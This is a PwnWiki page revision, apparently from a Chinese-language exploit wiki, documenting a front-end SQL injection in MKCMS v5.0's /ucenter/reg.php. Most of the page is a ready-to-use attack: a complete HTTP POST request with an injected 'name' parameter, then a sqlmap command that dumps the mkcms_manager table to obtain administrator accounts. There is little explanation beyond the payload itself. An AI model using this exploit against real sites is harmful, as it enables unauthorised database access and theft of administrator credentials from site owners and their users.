Difference between revisions of "MKCMS v5.0 /ucenter/reg.php前台sql注入漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> MKCMS v5.0 ==POC== <pre> POST /ucenter/reg.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
MKCMS v5.0 | MKCMS v5.0 | ||
| Line 24: | Line 24: | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
獲取管理員帳號 | 獲取管理員帳號 | ||
</translate> | </translate> | ||
Latest revision as of 14:52, 10 July 2021
漏洞影響
MKCMS v5.0
POC
POST /ucenter/reg.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/ucenter/reg.php Content-Type: application/x-www-form-urlencoded Content-Length: 52 Connection: close Cookie: PHPSESSID=cb8e6ccde6cf9050972fa9461d606be3 Upgrade-Insecure-Requests: 1 name=test' AND 1=1 AND 'inject'='inject&email=sss%40qq.com&password=ssssss&submit=
獲取管理員帳號
sqlmap -r inject.txt -D mkcms -T mkcms_manager --dump